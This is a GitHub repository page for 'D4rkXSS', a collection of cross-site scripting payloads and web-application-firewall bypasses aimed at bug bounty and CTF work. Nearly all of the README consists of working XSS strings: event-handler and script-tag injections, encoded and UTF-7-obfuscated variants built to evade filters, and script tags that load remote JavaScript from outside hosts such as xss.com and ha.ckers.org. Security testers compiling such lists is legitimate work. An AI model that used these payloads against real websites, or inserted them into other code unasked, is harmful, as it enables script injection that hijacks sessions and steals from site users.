A list of useful payloads and bypasses for Web Application Security and Bug Bounty/CTF
Latest commit 2ba9627 Oct 17, 2019
Type Name Latest commit message Commit time
LICENSE License.md Sep 30, 2019
Misc.md Update Misc.md Sep 30, 2019
Polygot.md Update Oct 17, 2019
README.md Update Readme.md Sep 30, 2019
basicxss.txt All files Sep 30, 2019
brutelogic.txt All files Sep 30, 2019
fuzz.txt All files Sep 30, 2019
image.png Add files via upload Sep 30, 2019
jhaddix.txt All files Sep 30, 2019
mario.txt All files Sep 30, 2019
noscript.txt All files Sep 30, 2019
rsnake.txt All files Sep 30, 2019
seXSS.md Update seXSS.md Sep 30, 2019

README.md

D4rkXSS



All in one place for XSS.
R0X4R

Contribution

This is an open source repo. Anyone can contribute. 🍻

Bypass WAF

NO SCRIPT

  • For Example:
  • <acronym><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    <bgsound><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    <xmp><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    

    Brutelogic

  • For Example:
  • \'-alert(1)//
    </script><svg onload=alert(1)>
    <x contenteditable onblur=alert(1)>lose focus!
    

    Fuzz3r

  • For Example:
  • #getURL,javascript:alert(1)",
    #goto,javascript:alert(1)",	
    ?javascript:alert(1)",
    
    

    IMG Error

  • Encoding
  • <img onerror="location='javascript:=lert(1)'" src="x">
    <img onerror="location='javascript:%61lert(1)'" src="x">
    <img onerror="location='javascript:\x2561lert(1)'" src="x">
    <img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
    

    Jhaddix

  • For Example:
  • '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
    <<scr\0ipt/src=http://xss.com/xss.js></script
    %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
    ' onmouseover=alert(/Black.Spook/)
    
    

    RSnake

  • For Example:
  • <SCRIPT>alert('XSS');</SCRIPT>
    '';!--"<XSS>=&{()}
    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
    
    

    MarioXSS

    Mario

  • For Example:
  • <div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>
    

    Search Engine XSS

    seXSS

    Misc Payloads

    Misc

    Basic Payloads

    Basic

  • For Example:
  • <script>alert('1')</script>
    "><script>alert('1')</script>
    <svg/onload=alert('1');
    